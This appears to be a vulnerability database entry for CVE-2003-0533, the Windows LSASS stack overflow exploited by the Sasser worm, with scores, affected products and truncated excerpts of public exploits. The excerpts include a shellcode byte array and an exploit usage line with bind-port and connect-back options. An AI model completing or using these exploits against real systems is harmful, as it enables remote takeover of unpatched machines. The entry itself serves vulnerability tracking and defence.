7.5
CVSSv2

CVE-2003-0533

Published: 01/06/2004 Updated: 12/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 765
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote malicious users to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

microsoft netmeeting

microsoft windows me

microsoft windows nt 4.0

microsoft windows 2003 server r2

microsoft windows 98

microsoft windows xp

microsoft windows 2000

Exploits

## # $Id: ms04_011_lsassrb 9669 2010-07-03 03:13:45Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions Please see the Metasploit # Framework web site for more information on licensing and terms of use # metasploitcom/framework/ ## require 'msf/core' class M ...
#include <windowsh> #pragma comment(lib,"mprlib") #pragma comment(lib, "ws2_32") unsigned char scode[] = "\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA" "\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x02\x99\x99\x99" "\x ...
/* HOD-ms04011-lsasrv-explc: * * MS04011 Lsasrvdll RPC buffer overflow remote exploit * Version 01 coded by * * * ::[ houseofdabus ]:: * * * ------------------------------------------------------------------- * Usage: * * expl <target> <victim IP> <bindport> [connectback IP] [options] * * Targ ...

Github Repositories

My traffic analysis for the computational Security class at UFPR

traffic-analysis My traffic analysis for the computational Security class at UFPR vamos utilizar o tcpdump para ler o arquivo pcap com o tráfego de rede e responder as perguntas: Quais endereços IP/hosts estão envolvidos? (1pt) O que você consegue descobrir sobre a máquina atacante (ex: onde ela está localizada)? (1pt) Quantas sess&ot